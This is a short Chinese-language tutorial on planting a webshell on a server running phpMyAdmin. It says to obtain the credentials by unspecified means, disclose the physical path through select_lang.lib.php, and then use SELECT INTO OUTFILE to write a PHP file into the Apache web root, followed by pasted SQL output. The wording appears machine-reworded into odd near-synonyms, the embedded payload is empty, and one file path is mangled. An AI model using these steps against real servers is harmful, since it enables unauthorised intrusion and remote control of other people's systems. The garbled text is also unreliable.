1.怎祥取得用户名和密码,自身想办法。
2.会见 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到 物理学途径.
3.挑选一个Database.运作下列句子.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('
');
select cmd from a into outfile 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php/d.php';
Drop TABLE IF EXISTS a;
----end code---
4.倘若没有什么出现意外.相匹配网址得到 webshell
您运作的 SQL 句子早已乐成运作了。
SQL 查看:
CREATE TABLE a(
cmd text NOT NULL
);# MySQL 回到的查看实际效果为空(即零行)。
INSERT INTO a( cmd )
VALUES (
'
'
);# 危害行数: 1
SELECT cmd
FROM a
INTO OUTFILE 'F:/Program Files/Apache Group/Apache2/htdocs/phpMyAdmin/d.php';# 危害行数: 1
DROP TABLE IF EXISTS a;# MySQL 回到的查看实际效果为空(即零行)。